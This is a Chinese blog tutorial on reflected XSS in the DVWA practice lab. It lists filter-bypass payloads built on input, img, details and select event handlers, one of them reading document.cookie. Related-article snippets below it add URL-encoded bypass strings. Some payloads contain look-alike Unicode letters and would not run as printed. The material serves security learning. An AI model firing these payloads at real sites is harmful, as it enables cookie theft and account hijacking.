XSS漏洞详解以及绕过方式。

最新推荐文章于 2024-04-24 10:36:07 发布
最新推荐文章于 2024-04-24 10:36:07 发布
阅读量1.4k 收藏 1
点赞数
文章标签: xss web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63028223/article/details/124775656
版权

下列以dvwa靶场为例:

反射性XSS:

LOW级别

<script>alert('test')</script>

最基本的原理,就是前端对输入的内容过滤不严谨,是的输入的元素再html框架中得以运行。

medium级别

可能过滤了js标签,我们使用input标签,

<input οnblur=alert`1`>当input失去焦点时会触发

<input οnclick=alert `123'> 当input获取焦点(点击输入)时触发

都可以

confirm

 <input οnclick=confirm `123'> 当input获取焦点(点击输入)时触发(选择性弹框)

这两种姿势再High中也同样适用。

直接提到high用于测试。


<input οnfοcus="alert( 'xss '); " autofocus>通过执行auto属性执行本身的focus事件

<img src=x οnerrοr=prompt `he11oxss'>注意使用的是反引号包裹

img标签原理:插入一个没有的图片,当浏览器找不到图片时,自动执行后边的代码。


<img src=1 οnclick=alert `1`>当鼠标在图片上时触发


<img src=1 onc1ick=alert`1`>点击图片触发

<details οntοggle="alert( 'xss ')">点击下拉选项时触发

<details open οntοggle="alert('xss ')">通过open属性自动触发

<select οnfοcus=alert(document.cookie)  autofocus></select>点击下拉选项时触发

一个番茄锅
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
什么是 XSS 攻击?
m0_38066007的博客
04-23 77
XSS 攻击指的是跨站脚本攻击,是一种代码注入攻击。攻击者通过在网站注入恶意脚本,使之在用户的浏览器上运行,从而盗取用户的信息如 cookie 等。XSS 的本质是因为网站没有对恶意代码进行过滤,与正常的代码混合在一起了,浏览器没有办法分辨哪些脚本是可信的,从而导致了恶意代码的执行。
过滤的绕过
weixin_53259175的博客
11-19 708
xss=111”%20onerror=location=“javasc”%2b"ript:al"%2b"ert%25281%2529 可以看出弹窗实现,这里使用了字符串拼接的方法进行了关键字的绕过。其中%2b是字符+的url编码,js中的字符拼接也是使用+字符来实现的。xss=111"%20onerror=location=“javasc”%2b"ript:prompt%25281%2529 可以发现弹窗也可以实现,这里使用了其他的弹窗方法绕过,所以也可以使用其他未过滤且功能相同的方法来绕过
JSP安全开发之XSS漏洞详解
10-21
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的。
前端常见安全漏洞
whaleluo的博客
05-11 1604
文章目录xss跨站脚本攻击csrf->xsrf跨站请求伪造攻击SSRF服务端请求构造点击劫持sql注入 xss跨站脚本攻击 以"文章发布系统"为例 input输入框输入字符串后使用v-html渲染成HTML显示在当前页面 当input输入script(sc里面的js不会执行) <script>alert(document.cookie)</script> 当input输入img标签的onerror回调(弹出cookie) <img src="test" on
XSS触发语句小结
7Riven's blog
01-01 1959
一、标准语句 <script>alert(/XSS/)</script> 二、尝试大小写 <sCript>alert(1)</scRipt> 三、使用<img>标签 1、windows事件 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("...
XSS漏洞攻防
m0_57485346的博客
03-14 1728
XSS
【自用】xsspayload
头发和技术只能选择一个
09-28 314
(1)普通的XSS JavaScript注入 (2)IMG标签XSS使用JavaScript命令 (3)IMG标签无分号无引号 (4)IMG标签大小写不敏感 (5)HTML编码(必须有分号) (6)修正缺陷IMG标签 <IMG “”">”> (7)formCharCode标签(计算器) (8)UTF-8的Unicode编码(计算器) <IMG SRC=jav…省略…S’)> (9)7位的UTF-8的Unicode编码是没有分号的(计算器) <IMG SRC
XSS讲解下(web安全入门11)
黑战士的博客
05-15 1578
一、XSS 的构造 1.1 利用[<>]构造 HTML/JS 可以利用[<>]构造 HTML 标签和] 1.2 伪协议 亦可以使用 JavaScript:伪协议的方式构造 XSS 在 IE 浏览器的地址栏中输入[javascript:alert(/XSS/);],弹框成功 提交参数[click me!] 点击超链接。即可触发 XSS 也可使用 img 标签的伪协议,但这种方法只在 IE6 下测试成功 [<img src="javascript:alert(/XSS/)">
图片引用功能导致的XSS漏洞
yggcwhat
09-29 2305
图片引用功能导致的XSS漏洞
网络安全(2) -- 关于一次XSS攻击-图片(img标签)的onerror事件
热门推荐
TaneRoom的博客
11-08 2万+
记一次XSS实战攻击
反射型XSS-利用img绕过班花存放私密照的方案
jklbnm12的博客
09-07 988
前言:这是记录的前几天挖到的一个反射型xss漏洞,也是我在补天平台挖到的第一个专属src漏洞,详细的站点这里就不透露了,虽然目前查看了一下原漏洞已经被修补了。 1、挖掘的起点源于对某页… 前言:这是记录的前几天挖到的一个反射型xss漏洞,也是我在补天平台挖到的第一个专属src漏洞,详细的站点这里就不透露了,虽然目前查看了一下原漏洞已经被修补了。 1、挖掘的起点源于对某页面url中title参数的测试,该参数提交后被反射回来 <span class="brand\_left\_txt1" id="c.
记录几种XSS绕过方式1
08-03
记录几种XSS绕过方式一.服务端全局替换为空的特性比如某站正则 过滤了onerror 过滤了script 这些 但是“ 或者 ‘ 这这种符号会变成空可以绕过,例
XSSBypass:XSS绕过技术
05-17
XSS绕过 XSS绕过技术,带来乐趣和收益。 尝试使用XSS漏洞逐行绕过Web应用程序安全XSS过滤器。
JSP使用过滤器防止Xss漏洞
10-17
主要为大家详细介绍了JSP使用过滤器防止Xss漏洞,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
ctfshow——XSS
最新发布
qq_55202378的博客
04-24 1031
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS。恶意攻击者往 WEB 页面里插入恶意 HTML 代码,当用户浏览该页之时,嵌入其中 Web 里面的 HTML 代码会被执行,从而达到恶意攻击用户的特殊目的。
pikachu-xss
2303_81631620的博客
04-23 322
按原本的做法,应该先写一个script标签测试一下,但是发现有字符限制。
Web前端安全问题分类综合以及XSS、CSRF、SQL注入、DoS/DDoS攻击、会话劫持、点击劫持等详解,增强生产安全意识
JINGWHALE
04-22 938
本文介绍了Web前端安全问题分类综合以及XSS、CSRF、SQL注入、DoS/DDoS攻击、会话劫持、点击劫持等详解,增强生产安全意识。Web前端作为与用户直接交互的界面,其安全性问题直接关系到用户体验和数据安全。近年来,随着前端技术的快速发展,Web前端安全问题也日益凸显。因此,加强生产安全意识,深入理解并防范前端安全问题,对于保障整个Web应用的安全性至关重要。
XSS-跨站脚本攻击 漏洞详解
m0_69043895的博客
04-20 978
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。
dvwa中利用xss漏洞绕过csrf漏洞
05-20
在DVWA中,可以使用以下步骤来利用XSS漏洞绕过CSRF漏洞: 1. 打开DVWA,进入CSRF页面。在这个页面上,你将需要创建一个新的帖子。 2. 在新帖子的标题中,我们可以插入一段XSS代码,例如:`<script>document.forms...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值